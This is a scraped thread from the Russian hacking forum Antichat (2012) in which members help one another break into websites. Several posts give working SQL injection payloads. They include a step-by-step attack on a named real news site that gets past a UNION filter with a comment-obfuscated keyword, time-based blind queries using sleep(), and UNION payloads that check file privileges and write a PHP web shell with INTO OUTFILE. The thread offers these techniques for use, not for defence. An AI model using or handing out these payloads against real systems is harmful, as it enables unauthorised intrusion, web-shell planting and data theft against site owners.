HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19071  
Старый 03.01.2012, 13:48
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от [R  
eD"]
[R]eD said:
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?
UNION не работает кстати после ORDER BY.

Единственное, что я вижу, что можно попробовать, это

Код:
Code:
INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +''
Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off

Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало.

Крутить как-то так:

Код:
Code:
, 100
UPD

Код:
Code:
SELECT user FROM mysql.user  ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0));

SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0));
Ток если записей много, то лучше юзать LIMIT.

Что-то по типу blind sleep-based sql injection
 
Ответить с цитированием

  #19072  
Старый 03.01.2012, 14:08
AlonDelon
Guest
Сообщений: n/a
Провел на форуме:
106017

Репутация: -3
По умолчанию

можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.

CMS WP

Цитата:
Сообщение от None  
If you are the webmaster of this site make sure that:
* You have uploaded correctly your files to the public_html directory which is the web-root of your account;
* You have not misspelled the URL. Bear in mind that letters are case sensitive and no blank spaces are recommended;
* In case you have applied SEO - SEF URL rewrite rules, make sure you have renamed the htaccess.txt file to .htaccess. If there is already a non-empty .htaccess file, check it and make sure the necessary rules are uncommented.
 
Ответить с цитированием

  #19073  
Старый 03.01.2012, 14:10
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от AlonDelon  
AlonDelon said:
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP
Инглиш бро. Криво установлено все.
 
Ответить с цитированием

  #19074  
Старый 03.01.2012, 15:28
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?

_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
 
Ответить с цитированием

  #19075  
Старый 03.01.2012, 15:41
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
Код:
Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title 5.1.33-log

Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто
 
Ответить с цитированием

  #19076  
Старый 03.01.2012, 15:56
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Код:
Code:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title
5.1.33-log
Вот так бро
А то в поиске заморочки с LIKE. Вообщем все гениальное просто
как ты количество полей подобрал, каким запросом?
 
Ответить с цитированием

  #19077  
Старый 03.01.2012, 16:01
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
как ты количество полей подобрал, каким запросом?
Тут главное внимательность.

http://1cnews.com/index.php?mode=viewpart&part=10

Делаем запрос:

http://1cnews.com/index.php?mode=viewpart&part=10'

В заголовке исчезает "Events of the branch". Что то тут не так

Проверяем на inj.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1

"Events of the branch" появился. А если:

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2

Исчез. Соответственно, true и false.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+1 0--+f

Заголовок исчез.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f

Пояивлся, соответственно, кол-во 3.

Ну а дальше

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+sele ct+1,2,3--+f

403 forbidden

Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/

Пробуем

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f

Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2.

P.S. Вообщем контент-based injection
 
Ответить с цитированием

  #19078  
Старый 03.01.2012, 17:48
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию

Есть доступ к бд как залить shell ?
 
Ответить с цитированием

  #19079  
Старый 03.01.2012, 17:52
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от Groove  
Groove said:
Есть доступ к бд как залить shell ?
Сначала посмотри File_priv. Для этого:

http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f

Копируем юзера.

http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f

Если выведет N, то залить не получится. Если Y + mq=off, то:

http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f

После этого шелл будет по адресу site.ltd/dir/file.php
 
Ответить с цитированием

  #19080  
Старый 03.01.2012, 17:56
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ